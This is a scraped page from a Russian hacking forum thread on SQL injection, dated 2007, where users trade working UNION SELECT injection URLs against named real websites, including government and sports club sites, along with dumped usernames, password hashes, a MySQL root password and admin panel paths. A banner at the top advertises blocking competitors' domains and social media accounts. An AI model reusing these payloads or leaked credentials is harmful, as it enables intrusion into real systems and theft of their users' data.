Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 214 из 1242

214

Опции темы

Поиск в этой теме

Опции просмотра

#2131

04.05.2007, 19:20

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

Ну, во-первых, не все сайты интересные и посещаемые, уязвимости есть не на всех, а на многих из тех, которые уязвимы, не всегда получается подобрать названия полезных таблиц. И еще реже получается попасть в админку и шелл заюзать.
Плюс бывают интересные особенности, фильтрации и т.п.

#2132

04.05.2007, 19:25

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Dracula4ever сделай хотя бы одну иньекцию на asp

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#2133

04.05.2007, 21:05

REx07

Новичок

Регистрация: 01.05.2007

Сообщений: 15

Провел на форуме:
15231

Репутация: 7

Отправить сообщение для REx07 с помощью ICQ

Что касается аспа...
Тут какая-то турецкая муть:

_http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adm in

для получения пасса меняем на "sifre"

Админка валяется тут:
http://www.banaz.bel.tr/admin/kontrol.asp

#2134

04.05.2007, 22:01

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

.gov

Код:

http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSION(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*

sql-inj

#2135

05.05.2007, 00:28

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-inj

Футбол.

Сайт: www.liverpoolfc.ru
уязвимость: http://www.liverpoolfc.ru/news.php?id=1673'
подобранные таблицы: users
подобранные поля: user_name,user_pass,user_id
1:Jari:034054de62d75ca7

Цитата:

http://www.liverpoolfc.ru/news.php?id=-1673+union+select+1,2,concat_ws(0x3a,user_id,user_ name,user_pass),4,5,6+from+users/*

админка

Цитата:

http://www.liverpoolfc.ru/_redadmin/

Не окончено:
http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом

#2136

05.05.2007, 01:18

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Код:

http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+2,1/*

.gov

Код:

http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),password),4,5,6+from+mysql.user/*

MySQL root:zaq12345

Последний раз редактировалось maxster; 08.05.2007 в 21:47..

#2137

05.05.2007, 07:07

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username,9,10,11+from+members/*

user:perfilov
password:248192
email:dood@webserver.com

Код:

http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/*

#2138

05.05.2007, 07:46

Dracula4ever

Постоянный

Регистрация: 08.05.2006

Сообщений: 559

Провел на форуме:
1593567

Репутация: 354

Отправить сообщение для Dracula4ever с помощью ICQ

Отправить сообщение для Dracula4ever с помощью AIM

Отправить сообщение для Dracula4ever с помощью Yahoo

nero.com

Код:

http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/*

stpatsfc.com

Код:

http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*

Последний раз редактировалось Dracula4ever; 05.05.2007 в 07:53..

#2139

05.05.2007, 09:46

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Дракула и то и другое жесточайший боян- http://hlamidnik.h18.ru/SQLS.html

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#2140

05.05.2007, 13:34

+StArT+

Познающий

Регистрация: 10.02.2007

Сообщений: 38

Провел на форуме:
1223241

Репутация: 183

Отправить сообщение для +StArT+ с помощью ICQ

www.sdg.ncsa.uiuc.edu
Национальный Центр высокоэффективных вычислительных ресурсов NCSA

Код:

http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database()),3,4,5,6,7,8,9,10/*

Страница 214 из 1242

214

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)

Быстрый переход